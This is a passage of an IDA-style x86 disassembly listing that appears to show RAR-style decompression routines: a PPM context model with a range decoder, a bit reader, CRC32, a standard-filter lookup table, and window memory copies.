mov edi, [edi]
cmp edi, [ebx+4]
mov [ebp+var_4], edi
jnz loc_9B1E7F
jmp loc_9B1E6E
; ---------------------------------------------------------------------------
loc_9B1FDC: ; CODE XREF: sub_9B1D29+AF�j
mov byte ptr [ebx+4C88h], 0
jmp loc_9B1E77
sub_9B1D29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1FE8 proc near ; CODE XREF: sub_9B25BF+34�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
movzx eax, word ptr [edi+8]
mov [esi+870h], eax
push ebx
lea ebx, [esi+85Ch]
mov eax, [ebx+8]
xor edx, edx
div dword ptr [ebx+14h]
mov ecx, [edi+4]
xor edx, edx
mov [ebp+var_4], eax
mov [ebx+8], eax
mov eax, [ebx+4]
sub eax, [ebx]
div [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [esi+870h]
cmp [ebp+var_4], eax
jnb short loc_9B2075
movzx edx, byte ptr [ecx+5]
cmp [ebp+var_4], edx
jge short loc_9B2070
lea ebx, [edx+edx]
cmp ebx, eax
setnbe al
mov [esi+4C89h], al
mov [esi+86Ch], edx
movzx eax, al
add [esi+880h], eax
add edx, 4
mov [esi], ecx
mov [ecx+5], dl
add word ptr [edi+8], 4
cmp edx, 7Ch
jle short loc_9B2067
push esi
mov eax, edi
call sub_9B1A07
pop ecx
loc_9B2067: ; CODE XREF: sub_9B1FE8+74�j
and dword ptr [esi+868h], 0
jmp short loc_9B20DB
; ---------------------------------------------------------------------------
loc_9B2070: ; CODE XREF: sub_9B1FE8+45�j
cmp dword ptr [esi], 0
jnz short loc_9B2079
loc_9B2075: ; CODE XREF: sub_9B1FE8+3C�j
xor eax, eax
jmp short loc_9B20DE
; ---------------------------------------------------------------------------
loc_9B2079: ; CODE XREF: sub_9B1FE8+8B�j
mov byte ptr [esi+4C89h], 0
movzx ebx, word ptr [edi+0Ah]
dec ebx
jmp short loc_9B208A
; ---------------------------------------------------------------------------
loc_9B2087: ; CODE XREF: sub_9B1FE8+AE�j
dec ebx
jz short loc_9B20E1
loc_9B208A: ; CODE XREF: sub_9B1FE8+9D�j
movzx eax, byte ptr [ecx+0Bh]
add ecx, 6
add edx, eax
cmp edx, [ebp+var_4]
jle short loc_9B2087
mov [esi+86Ch], edx
movzx eax, byte ptr [ecx+5]
sub edx, eax
mov [esi+868h], edx
mov [esi], ecx
add byte ptr [ecx+5], 4
add word ptr [edi+8], 4
mov al, [ecx+5]
cmp al, [ecx-1]
jbe short loc_9B20DB
lea eax, [ecx-6]
push eax
push ecx
call sub_9B19E1
add esp, 8
mov [esi], eax
cmp byte ptr [eax+5], 7Ch
jbe short loc_9B20DB
push esi
mov eax, edi
call sub_9B1A07
pop ecx
loc_9B20DB: ; CODE XREF: sub_9B1FE8+86�j
; sub_9B1FE8+D3�j ...
xor eax, eax
inc eax
loc_9B20DE: ; CODE XREF: sub_9B1FE8+8F�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B20E1: ; CODE XREF: sub_9B1FE8+A0�j
mov eax, [esi]
movzx eax, byte ptr [eax+4]
mov al, [eax+esi+0B88h]
mov [esi+4C8Ah], al
mov [esi+868h], edx
mov dl, [esi+4C88h]
add ecx, 4
movzx eax, byte ptr [ecx]
mov [eax+esi+888h], dl
movzx eax, word ptr [edi+0Ah]
mov [esi+650h], eax
dec eax
and dword ptr [esi], 0
loc_9B211B: ; CODE XREF: sub_9B1FE8+147�j
mov bl, [esi+4C88h]
sub ecx, 6
dec eax
movzx edx, byte ptr [ecx]
mov [edx+esi+888h], bl
jnz short loc_9B211B
mov eax, [esi+870h]
mov [esi+86Ch], eax
jmp short loc_9B20DB
sub_9B1FE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B213F proc near ; CODE XREF: sub_9B25BF+47�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, [ecx]
movzx eax, byte ptr [eax+4]
mov al, [eax+ecx+0B88h]
mov [ecx+4C8Ah], al
push ebx
push esi
push edi
lea edi, [edx+4]
mov edx, [edx]
movzx edx, word ptr [edx+0Ah]
movzx edx, byte ptr [edx+ecx+0A87h]
movzx esi, byte ptr [edi+4]
movzx esi, byte ptr [esi+ecx+0B88h]
movzx ebx, byte ptr [edi+5]
shl ebx, 5
add esi, ebx
lea edx, [edx+esi*2+604h]
mov esi, [ecx+880h]
sar esi, 1Ah
and esi, 20h
add edx, esi
movzx esi, byte ptr [ecx+4C89h]
add edx, esi
movzx eax, al
add edx, eax
lea esi, [ecx+edx*2]
lea edx, [ecx+85Ch]
shr dword ptr [edx+8], 0Eh
movzx eax, word ptr [esi]
mov ebx, [edx+8]
mov [ebp+var_4], eax
mov eax, [edx+4]
sub eax, [edx]
xor edx, edx
div ebx
mov edx, [ebp+var_4]
cmp eax, edx
jnb short loc_9B220E
mov [ecx], edi
mov al, [edi+5]
cmp al, 80h
setb dl
add dl, al
mov [edi+5], dl
and dword ptr [ecx+868h], 0
movzx eax, word ptr [esi]
mov [ecx+86Ch], eax
xor eax, eax
mov ax, [esi]
movzx edx, ax
add edx, 20h
sar edx, 7
sub eax, edx
add eax, 80h
mov [esi], ax
inc dword ptr [ecx+880h]
mov byte ptr [ecx+4C89h], 1
jmp short loc_9B2269
; ---------------------------------------------------------------------------
loc_9B220E: ; CODE XREF: sub_9B213F+87�j
mov [ecx+868h], edx
xor eax, eax
mov ax, [esi]
movzx edx, ax
add edx, 20h
sar edx, 7
sub eax, edx
mov [esi], ax
mov dl, [ecx+4C88h]
mov dword ptr [ecx+86Ch], 4000h
movzx eax, word ptr [esi]
shr eax, 0Ah
movzx eax, ds:byte_9A6AD4[eax]
mov [ecx+874h], eax
mov dword ptr [ecx+650h], 1
movzx eax, byte ptr [edi+4]
mov [eax+ecx+888h], dl
and dword ptr [ecx], 0
mov byte ptr [ecx+4C89h], 0
loc_9B2269: ; CODE XREF: sub_9B213F+CD�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B213F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B226E proc near ; CODE XREF: sub_9B2309+19�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov cx, [eax+0Ah]
cmp cx, 100h
push esi
mov esi, [ebp+arg_0]
jz short loc_9B22F6
push ebx
xor ebx, ebx
cmp [edx+650h], esi
push edi
setnle bl
movzx edi, cx
movzx ecx, byte ptr [edx+esi+987h]
movzx esi, word ptr [eax+8]
mov eax, [eax]
movzx eax, word ptr [eax+0Ah]
mov [ebp+var_4], edi
imul edi, 0Bh
lea ecx, [ebx+ecx*4]
xor ebx, ebx
cmp esi, edi
setl bl
sub eax, [ebp+var_4]
lea ecx, [ebx+ecx*2]
xor ebx, ebx
cmp [ebp+arg_0], eax
setl bl
xor esi, esi
lea eax, [ebx+ecx*2]
movzx ecx, byte ptr [edx+4C8Ah]
add eax, ecx
lea eax, [edx+eax*4+0Ch]
mov si, [eax]
mov cl, [eax+2]
movzx edi, si
shr edi, cl
xor ecx, ecx
sub esi, edi
test edi, edi
setz cl
mov [eax], si
add ecx, edi
pop edi
mov [edx+870h], ecx
pop ebx
jmp short loc_9B2306
; ---------------------------------------------------------------------------
loc_9B22F6: ; CODE XREF: sub_9B226E+11�j
lea eax, [edx+64Ch]
mov dword ptr [edx+870h], 1
loc_9B2306: ; CODE XREF: sub_9B226E+86�j
pop esi
leave
retn
sub_9B226E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2309 proc near ; CODE XREF: sub_9B25BF+132�p
var_410 = dword ptr -410h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 410h
push edi
movzx edi, word ptr [ebx+0Ah]
sub edi, [esi+650h]
mov eax, ebx
push edi
mov edx, esi
call sub_9B226E
mov [ebp+var_C], eax
lea eax, [ebp+var_410]
mov [ebp+var_10], eax
mov eax, [ebx+4]
sub eax, 6
and [ebp+var_4], 0
pop ecx
loc_9B233E: ; CODE XREF: sub_9B2309+49�j
; sub_9B2309+5C�j
movzx edx, byte ptr [eax+0Ah]
mov cl, [esi+4C88h]
add eax, 6
cmp [edx+esi+888h], cl
jz short loc_9B233E
movzx ecx, byte ptr [eax+5]
add [ebp+var_4], ecx
mov ecx, [ebp+var_10]
add [ebp+var_10], 4
dec edi
mov [ecx], eax
jnz short loc_9B233E
mov edi, [ebp+var_4]
add [esi+870h], edi
lea ecx, [esi+85Ch]
mov eax, [ecx+8]
xor edx, edx
div dword ptr [ecx+14h]
xor edx, edx
mov [ebp+var_4], eax
mov [ecx+8], eax
mov eax, [ecx+4]
sub eax, [ecx]
mov ecx, [esi+870h]
div [ebp+var_4]
cmp eax, ecx
mov [ebp+var_4], eax
jb short loc_9B23A2
xor eax, eax
jmp loc_9B2481
; ---------------------------------------------------------------------------
loc_9B23A2: ; CODE XREF: sub_9B2309+90�j
cmp [ebp+var_4], edi
mov edx, [ebp+var_410]
lea eax, [ebp+var_410]
jge short loc_9B242F
mov ecx, edx
movzx ecx, byte ptr [ecx+5]
jmp short loc_9B23C6
; ---------------------------------------------------------------------------
loc_9B23BB: ; CODE XREF: sub_9B2309+C0�j
add eax, 4
mov edx, [eax]
movzx edi, byte ptr [edx+5]
add ecx, edi
loc_9B23C6: ; CODE XREF: sub_9B2309+B0�j
cmp ecx, [ebp+var_4]
jle short loc_9B23BB
mov edi, [ebp+var_C]
mov [esi+86Ch], ecx
movzx eax, byte ptr [edx+5]
sub ecx, eax
mov [esi+868h], ecx
mov cl, [edi+2]
cmp cl, 7
mov [ebp+var_5], cl
jnb short loc_9B2401
dec byte ptr [edi+3]
jnz short loc_9B2401
shl word ptr [edi], 1
mov al, 3
shl al, cl
mov [edi+3], al
mov al, cl
inc al
mov [edi+2], al
loc_9B2401: ; CODE XREF: sub_9B2309+E0�j
; sub_9B2309+E5�j
mov [esi], edx
add byte ptr [edx+5], 4
add word ptr [ebx+8], 4
cmp byte ptr [edx+5], 7Ch
jbe short loc_9B241B
push esi
mov eax, ebx
call sub_9B1A07
pop ecx
loc_9B241B: ; CODE XREF: sub_9B2309+107�j
mov eax, [esi+884h]
inc byte ptr [esi+4C88h]
mov [esi+880h], eax
jmp short loc_9B247E
; ---------------------------------------------------------------------------
loc_9B242F: ; CODE XREF: sub_9B2309+A8�j
mov [esi+868h], edi
mov [esi+86Ch], ecx
movzx edi, word ptr [ebx+0Ah]
sub edi, [esi+650h]
lea eax, [ebp+var_410]
sub eax, 4
loc_9B244E: ; CODE XREF: sub_9B2309+15C�j
mov dl, [esi+4C88h]
add eax, 4
dec edi
mov ecx, [eax]
movzx ecx, byte ptr [ecx+4]
mov [ecx+esi+888h], dl
jnz short loc_9B244E
mov eax, [ebp+var_C]
mov cx, [esi+870h]
add [eax], cx
movzx eax, word ptr [ebx+0Ah]
mov [esi+650h], eax
loc_9B247E: ; CODE XREF: sub_9B2309+124�j
xor eax, eax
inc eax
loc_9B2481: ; CODE XREF: sub_9B2309+94�j
pop edi
leave
retn
sub_9B2309 endp
; =============== S U B R O U T I N E =======================================
sub_9B2484 proc near ; CODE XREF: sub_9B0DF4+AB�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
mov [eax+670h], ecx
mov [eax+4], ecx
mov [eax+8], ecx
retn
sub_9B2484 endp
; =============== S U B R O U T I N E =======================================
sub_9B2497 proc near ; CODE XREF: sub_9B0DF4+E8�p
; sub_9B1166+1E�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add eax, 654h
jmp sub_9B13C5
sub_9B2497 endp
; =============== S U B R O U T I N E =======================================
sub_9B24A5 proc near ; CODE XREF: sub_9B030E+878�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
lea edi, [esi+654h]
mov eax, edi
call sub_9B13C5
xor eax, eax
inc eax
call sub_9B13DA
push 2
pop eax
pop edi
mov ecx, esi
pop esi
jmp sub_9B192C
sub_9B24A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B24CC proc near ; CODE XREF: sub_9AF875+6B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push edi
push [ebp+arg_8]
push [ebp+arg_4]
call sub_9AF380
mov ebx, [ebp+arg_0]
mov edi, eax
mov [ebp+var_8], edi
shr edi, 5
and edi, 1
pop ecx
pop ecx
jz loc_9B257D
push [ebp+arg_8]
push [ebp+arg_4]
call sub_9AF380
pop ecx
pop ecx
mov [ebp+var_C], eax
loc_9B2505: ; CODE XREF: sub_9B24CC+B8�j
test byte ptr [ebp+var_8], 40h
jz short loc_9B251D
push [ebp+arg_8]
push [ebp+arg_4]
call sub_9AF380
pop ecx
pop ecx
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_9B251D: ; CODE XREF: sub_9B24CC+3D�j
push esi
lea esi, [ebx+85Ch]
and dword ptr [esi+4], 0
and dword ptr [esi], 0
or dword ptr [esi+8], 0FFFFFFFFh
mov [ebp+var_4], 4
loc_9B2536: ; CODE XREF: sub_9B24CC+85�j
push [ebp+arg_8]
push [ebp+arg_4]
call sub_9AF380
pop ecx
pop ecx
mov ecx, [esi+4]
shl ecx, 8
or eax, ecx
dec [ebp+var_4]
mov [esi+4], eax
jnz short loc_9B2536
test edi, edi
jz short loc_9B25B2
mov eax, [ebp+var_8]
and eax, 1Fh
inc eax
mov esi, eax
cmp esi, 10h
jle short loc_9B2569
lea esi, [esi+esi*2-20h]
loc_9B2569: ; CODE XREF: sub_9B24CC+97�j
cmp esi, 1
jnz short loc_9B258E
lea eax, [ebx+654h]
loc_9B2574: ; CODE XREF: sub_9B24CC+E4�j
call sub_9B13C5
xor eax, eax
jmp short loc_9B25BA
; ---------------------------------------------------------------------------
loc_9B257D: ; CODE XREF: sub_9B24CC+23�j
cmp dword ptr [ebx+670h], 0
jnz loc_9B2505
xor eax, eax
jmp short loc_9B25BB
; ---------------------------------------------------------------------------
loc_9B258E: ; CODE XREF: sub_9B24CC+A0�j
mov eax, [ebp+var_C]
lea edi, [ebx+654h]
inc eax
call sub_9B13DA
test eax, eax
jz short loc_9B25AE
mov eax, esi
mov ecx, ebx
call sub_9B192C
test eax, eax
jnz short loc_9B25B2
loc_9B25AE: ; CODE XREF: sub_9B24CC+D3�j
mov eax, edi
jmp short loc_9B2574
; ---------------------------------------------------------------------------
loc_9B25B2: ; CODE XREF: sub_9B24CC+89�j
; sub_9B24CC+E0�j
xor eax, eax
cmp [ebx+4], eax
setnz al
loc_9B25BA: ; CODE XREF: sub_9B24CC+AF�j
pop esi
loc_9B25BB: ; CODE XREF: sub_9B24CC+C0�j
pop edi
pop ebx
leave
retn
sub_9B24CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B25BF proc near ; CODE XREF: sub_9B012B+13�p
; sub_9B012B+33�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
mov edx, [esi+4]
mov ecx, [esi+654h]
cmp edx, ecx
push edi
jbe short loc_9B25FC
mov edi, [esi+65Ch]
cmp edx, edi
ja short loc_9B25FC
cmp word ptr [edx+0Ah], 1
jz short loc_9B2604
mov eax, [edx+4]
cmp eax, ecx
jbe short loc_9B25FC
cmp eax, edi
ja short loc_9B25FC
mov edi, edx
call sub_9B1FE8
loc_9B25F8: ; CODE XREF: sub_9B25BF+137�j
test eax, eax
jnz short loc_9B260B
loc_9B25FC: ; CODE XREF: sub_9B25BF+14�j
; sub_9B25BF+1E�j ...
or eax, 0FFFFFFFFh
loc_9B25FF: ; CODE XREF: sub_9B25BF+1C9�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_9B2604: ; CODE XREF: sub_9B25BF+25�j
mov ecx, esi
call sub_9B213F
loc_9B260B: ; CODE XREF: sub_9B25BF+3B�j
mov ecx, [esi+868h]
lea eax, [esi+864h]
mov edx, [eax]
mov edi, edx
imul edi, ecx
add [esi+85Ch], edi
mov edi, [esi+86Ch]
sub edi, ecx
imul edi, edx
mov [eax], edi
cmp dword ptr [esi], 0
jz short loc_9B2663
mov eax, [esi]
movzx edi, byte ptr [eax+4]
xor ebx, ebx
cmp [esi+878h], ebx
jnz loc_9B26FB
mov eax, [eax]
cmp eax, [esi+654h]
jbe loc_9B26FB
mov [esi+8], eax
mov [esi+4], eax
jmp loc_9B272C
; ---------------------------------------------------------------------------
loc_9B2663: ; CODE XREF: sub_9B25BF+75�j
; sub_9B25BF+FC�j
mov eax, [esi+85Ch]
mov ecx, [esi+864h]
lea edx, [eax+ecx]
xor edx, eax
cmp edx, 1000000h
jb short loc_9B2691
cmp ecx, 8000h
jnb short loc_9B26BD
neg eax
and eax, 7FFFh
mov [esi+864h], eax
loc_9B2691: ; CODE XREF: sub_9B25BF+BB�j
push [ebp+arg_8]
lea ebx, [esi+860h]
push [ebp+arg_4]
call sub_9AF380
shl dword ptr [esi+864h], 8
pop ecx
pop ecx
mov ecx, [ebx]
shl ecx, 8
or eax, ecx
shl dword ptr [esi+85Ch], 8
mov [ebx], eax
jmp short loc_9B2663
; ---------------------------------------------------------------------------
loc_9B26BD: ; CODE XREF: sub_9B25BF+C3�j
mov eax, [esi+654h]
loc_9B26C3: ; CODE XREF: sub_9B25BF+130�j
mov ecx, [esi+4]
inc dword ptr [esi+878h]
mov ebx, [ecx]
cmp ebx, eax
mov [esi+4], ebx
jbe loc_9B25FC
cmp ebx, [esi+65Ch]
ja loc_9B25FC
movzx ecx, word ptr [ebx+0Ah]
cmp ecx, [esi+650h]
jz short loc_9B26C3
call sub_9B2309
jmp loc_9B25F8
; ---------------------------------------------------------------------------
loc_9B26FB: ; CODE XREF: sub_9B25BF+85�j
; sub_9B25BF+93�j
push esi
call sub_9B1D29
test eax, eax
pop ecx
jz loc_9B25FC
lea eax, [esi+4C88h]
cmp [eax], bl
jnz short loc_9B272C
push 100h ; Size
mov byte ptr [eax], 1
lea eax, [esi+888h]
push ebx ; Val
push eax ; Dst
call memset
add esp, 0Ch
loc_9B272C: ; CODE XREF: sub_9B25BF+9F�j
; sub_9B25BF+153�j ...
mov eax, [esi+85Ch]
mov ecx, [esi+864h]
lea edx, [eax+ecx]
xor edx, eax
cmp edx, 1000000h
jb short loc_9B275A
cmp ecx, 8000h
jnb short loc_9B2786
neg eax
and eax, 7FFFh
mov [esi+864h], eax
loc_9B275A: ; CODE XREF: sub_9B25BF+184�j
push [ebp+arg_8]
lea ebx, [esi+860h]
push [ebp+arg_4]
call sub_9AF380
shl dword ptr [esi+864h], 8
pop ecx
pop ecx
mov ecx, [ebx]
shl ecx, 8
or eax, ecx
shl dword ptr [esi+85Ch], 8
mov [ebx], eax
jmp short loc_9B272C
; ---------------------------------------------------------------------------
loc_9B2786: ; CODE XREF: sub_9B25BF+18C�j
mov eax, edi
jmp loc_9B25FF
sub_9B25BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B278D proc near ; CODE XREF: sub_9AF448+21�p
; sub_9AF448+46�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
mov ecx, [ebp+arg_4]
jz short loc_9B27A0
mov al, byte ptr [ebp+arg_8]
mov [ecx], al
pop ebp
retn
; ---------------------------------------------------------------------------
loc_9B27A0: ; CODE XREF: sub_9B278D+A�j
mov eax, [ebp+arg_8]
mov [ecx], eax
pop ebp
retn
sub_9B278D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B27A7 proc near ; CODE XREF: sub_9AF3BC+35�p
; sub_9B2968+9F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push edi
mov edi, [ebp+arg_8]
test edi, edi
jz short loc_9B27E3
push esi
loc_9B27B6: ; CODE XREF: sub_9B27A7+39�j
movzx eax, byte ptr [ecx]
push 8
inc ecx
pop esi
loc_9B27BD: ; CODE XREF: sub_9B27A7+36�j
mov edx, eax
xor edx, [ebp+arg_0]
test dl, 1
jz short loc_9B27D7
mov edx, [ebp+arg_0]
shr edx, 1
xor edx, 0EDB88320h
mov [ebp+arg_0], edx
jmp short loc_9B27DA
; ---------------------------------------------------------------------------
loc_9B27D7: ; CODE XREF: sub_9B27A7+1E�j
shr [ebp+arg_0], 1
loc_9B27DA: ; CODE XREF: sub_9B27A7+2E�j
shr eax, 1
dec esi
jnz short loc_9B27BD
dec edi
jnz short loc_9B27B6
pop esi
loc_9B27E3: ; CODE XREF: sub_9B27A7+C�j
mov eax, [ebp+arg_0]
pop edi
pop ebp
retn
sub_9B27A7 endp
; =============== S U B R O U T I N E =======================================
sub_9B27E9 proc near ; CODE XREF: sub_9B0206+F8�p
arg_0 = dword ptr 4
push 40004h ; Size
call sub_9B1311
pop ecx
mov ecx, [esp+arg_0]
mov [ecx], eax
xor ecx, ecx
test eax, eax
setnz cl
mov eax, ecx
retn
sub_9B27E9 endp
; =============== S U B R O U T I N E =======================================
sub_9B2804 proc near ; CODE XREF: sub_9B0DF4+FA�p
; sub_9B0FE1+176�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_9B281E
mov eax, [esi]
test eax, eax
jz short loc_9B281E
push eax ; Memory
call free
and dword ptr [esi], 0
pop ecx
loc_9B281E: ; CODE XREF: sub_9B2804+7�j
; sub_9B2804+D�j
pop esi
retn
sub_9B2804 endp
; =============== S U B R O U T I N E =======================================
sub_9B2820 proc near ; CODE XREF: sub_9AFBCB+251�p
; sub_9AFBCB+2E6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
mov eax, [esp+arg_4]
add eax, [ecx+0Ch]
mov edx, eax
sar edx, 3
add [ecx+8], edx
and eax, 7
mov [ecx+0Ch], eax
retn
sub_9B2820 endp
; =============== S U B R O U T I N E =======================================
sub_9B283A proc near ; CODE XREF: sub_9AFBCB+241�p
; sub_9AFBCB+2D2�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, [edx]
mov eax, [edx+8]
push ebx
xor ebx, ebx
add eax, ecx
mov bh, [eax]
push 8
pop ecx
sub ecx, [edx+0Ch]
mov bl, [eax+1]
movzx eax, byte ptr [eax+2]
shl ebx, 8
or ebx, eax
shr ebx, cl
and ebx, 0FFFFh
mov eax, ebx
pop ebx
retn
sub_9B283A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2868 proc near ; CODE XREF: sub_9AFBCB+26�p
; sub_9AFBCB+18C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push esi
call sub_9B283A
pop ecx
mov ecx, eax
and ecx, 0C000h
jz loc_9B2949
cmp ecx, 4000h
jz loc_9B291C
mov eax, [esi+0Ch]
inc eax
inc eax
cmp ecx, 8000h
push esi
mov ecx, eax
jz short loc_9B28F6
mov ebx, eax
sar ecx, 3
add [esi+8], ecx
and ebx, 7
mov [esi+0Ch], ebx
call sub_9B283A
add ebx, 10h
mov edi, eax
mov eax, [esi+8]
mov ecx, ebx
sar ecx, 3
add eax, ecx
and ebx, 7
push esi
shl edi, 10h
mov [ebp+var_4], eax
mov [esi+8], eax
mov [esi+0Ch], ebx
call sub_9B283A
or edi, eax
pop ecx
lea eax, [ebx+10h]
pop ecx
mov ecx, eax
sar ecx, 3
add ecx, [ebp+var_4]
and eax, 7
mov [esi+0Ch], eax
mov [esi+8], ecx
mov eax, edi
jmp short loc_9B2963
; ---------------------------------------------------------------------------
loc_9B28F6: ; CODE XREF: sub_9B2868+39�j
mov edi, eax
sar ecx, 3
add [esi+8], ecx
mov ebx, [esi+8]
and edi, 7
mov [esi+0Ch], edi
call sub_9B283A
pop ecx
lea ecx, [edi+10h]
mov edx, ecx
sar edx, 3
add edx, ebx
mov [esi+8], edx
jmp short loc_9B2944
; ---------------------------------------------------------------------------
loc_9B291C: ; CODE XREF: sub_9B2868+25�j
test ah, 3Ch
mov ecx, [esi+0Ch]
jnz short loc_9B2931
shr eax, 2
or eax, 0FFFFFF00h
add ecx, 0Eh
jmp short loc_9B293C
; ---------------------------------------------------------------------------
loc_9B2931: ; CODE XREF: sub_9B2868+BA�j
shr eax, 6
and eax, 0FFh
add ecx, 0Ah
loc_9B293C: ; CODE XREF: sub_9B2868+C7�j
mov edx, ecx
sar edx, 3
add [esi+8], edx
loc_9B2944: ; CODE XREF: sub_9B2868+B2�j
and ecx, 7
jmp short loc_9B2960
; ---------------------------------------------------------------------------
loc_9B2949: ; CODE XREF: sub_9B2868+19�j
mov ecx, [esi+0Ch]
add ecx, 6
mov edx, ecx
sar edx, 3
add [esi+8], edx
shr eax, 0Ah
and ecx, 7
and eax, 0Fh
loc_9B2960: ; CODE XREF: sub_9B2868+DF�j
mov [esi+0Ch], ecx
loc_9B2963: ; CODE XREF: sub_9B2868+8C�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B2868 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2968 proc near ; CODE XREF: sub_9B3A12+67�p
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 54h
push edi
push [ebp+arg_0]
mov [ebp+var_54], 35h
push 0FFFFFFFFh
mov [ebp+var_50], 0AD576887h
mov [ebp+var_4C], 1
mov [ebp+var_48], 39h
mov [ebp+var_44], 3CD7E57Eh
mov [ebp+var_40], 2
mov [ebp+var_3C], 78h
mov [ebp+var_38], 3769893Fh
mov [ebp+var_34], 3
mov [ebp+var_30], 1Dh
mov [ebp+var_2C], 0E06077Dh
mov [ebp+var_28], 6
mov [ebp+var_24], 95h
mov [ebp+var_20], 1C2C5DC8h
mov [ebp+var_1C], 4
mov [ebp+var_18], 0D8h
mov [ebp+var_14], 0BC85E701h
mov [ebp+var_10], 5
mov [ebp+var_C], 28h
mov [ebp+var_8], 46B9C560h
mov [ebp+var_4], 7
call sub_9B27A7
add esp, 0Ch
not eax
xor edx, edx
lea ecx, [ebp+var_54]
loc_9B2A16: ; CODE XREF: sub_9B2968+BE�j
cmp [ecx+4], eax
jnz short loc_9B2A1F
cmp [ecx], edi
jz short loc_9B2A2C
loc_9B2A1F: ; CODE XREF: sub_9B2968+B1�j
inc edx
add ecx, 0Ch
cmp edx, 7
jb short loc_9B2A16
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_9B2A2C: ; CODE XREF: sub_9B2968+B5�j
lea eax, [edx+edx*2]
mov eax, [ebp+eax*4+var_4C]
leave
retn
sub_9B2968 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B2A35(int, int, void *Src, int)
sub_9B2A35 proc near ; CODE XREF: sub_9AF4A5+CE�p
; sub_9AF4A5+E7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Src = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
mov eax, 40000h
cmp ecx, eax
jnb short loc_9B2A68
mov edx, [ebp+arg_0]
mov edx, [edx]
add edx, ecx
cmp [ebp+Src], edx
jz short loc_9B2A68
sub eax, ecx
cmp [ebp+arg_C], eax
jnb short loc_9B2A5A
mov eax, [ebp+arg_C]
loc_9B2A5A: ; CODE XREF: sub_9B2A35+20�j
push eax ; Size
push [ebp+Src] ; Src
push edx ; Dst
call memmove
add esp, 0Ch
loc_9B2A68: ; CODE XREF: sub_9B2A35+D�j
; sub_9B2A35+19�j
pop ebp
retn
sub_9B2A35 endp
; =============== S U B R O U T I N E =======================================
sub_9B2A6A proc near ; CODE XREF: sub_9B300B+38�p
; sub_9B300B+43�p
arg_0 = dword ptr 4
cmp dword ptr [eax+4], 2
jnz short loc_9B2A83
mov ecx, [eax]
mov eax, [eax+0Ch]
add eax, [ecx]
mov ecx, [esp+arg_0]
and eax, 3FFFFh
add eax, [ecx]
retn
; ---------------------------------------------------------------------------
loc_9B2A83: ; CODE XREF: sub_9B2A6A+4�j
mov eax, [eax]
retn
sub_9B2A6A endp
; =============== S U B R O U T I N E =======================================
sub_9B2A86 proc near ; CODE XREF: sub_9B2B17+441�p
; sub_9B2B17+455�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cdq
push 8
pop esi
idiv esi
xor edx, edx
push 20h
movzx esi, byte ptr [eax+ecx]
inc eax
mov dh, [eax+ecx]
lea eax, [eax+ecx+1]
mov ecx, [esp+8+arg_0]
and ecx, 7
or esi, edx
xor edx, edx
mov dh, [eax+1]
